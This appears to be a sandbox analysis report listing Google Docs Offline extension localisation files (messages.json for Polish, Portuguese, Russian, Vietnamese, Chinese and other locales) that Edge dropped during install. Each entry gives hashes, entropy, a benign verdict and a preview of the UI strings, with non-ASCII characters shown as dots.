Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

